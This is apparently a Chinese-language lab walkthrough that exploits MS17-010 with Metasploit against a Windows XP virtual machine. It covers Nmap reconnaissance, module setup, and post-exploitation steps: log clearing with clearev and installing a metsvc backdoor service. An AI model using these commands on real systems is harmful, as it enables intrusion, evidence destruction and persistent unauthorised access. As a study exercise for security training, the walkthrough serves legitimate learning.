-
VMware Windows XP 靶机(192.168.10.128)
-
VMware Kali Linux 攻击机(192.168.10.129)
-
首先在Kali的命令终端中输入 sudo msfconsole 进入MSF控制台。
-
运行 Nmap 对靶机进行信息收集
[*] exec: nmap 192.168.10.128 Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-08 22:32 EDT Nmap scan report for 192.168.10.128 Host is up (0.00052s latency). Not shown: 988 closed ports PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 777/tcp open multiling-http 1027/tcp open IIS 3389/tcp open ms-wbt-server 6002/tcp open X11:2 7001/tcp open afs3-callback 7002/tcp open afs3-prserver MAC Address: 00:0C:29:D1:04:41 (VMware) Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds -
通过 Matasploit 对靶机已知的漏洞 MS17-010 进行攻击
首先,搜索 MS17-010 漏洞的可用攻击模块 search ms17-010
选择一个攻击模块
这里使用默认的攻击载荷(payload)就行
使用 show options 命令检查所有攻击参数
只要设置靶机地址就行了(LHOSTS) set rhosts 192.168.10.128
使用 show options 命令检查一下
确认无误后 run
三、后渗透操作-
可以看到成功入侵到靶机,使用 screenshot 检查一下
出现 Screenshot saved to: /home/kali/oBPzDfpw.jpeg
-
删除系统日志文件
clearev , 检查一下,可以看到日志都清空了
-
执行 run metsvc -A 上传服务后门
发现后门服务成功上传,这时候可以利用图中的31377端口对靶机进行攻击了
这时候退出重新 nmap 一下,成功



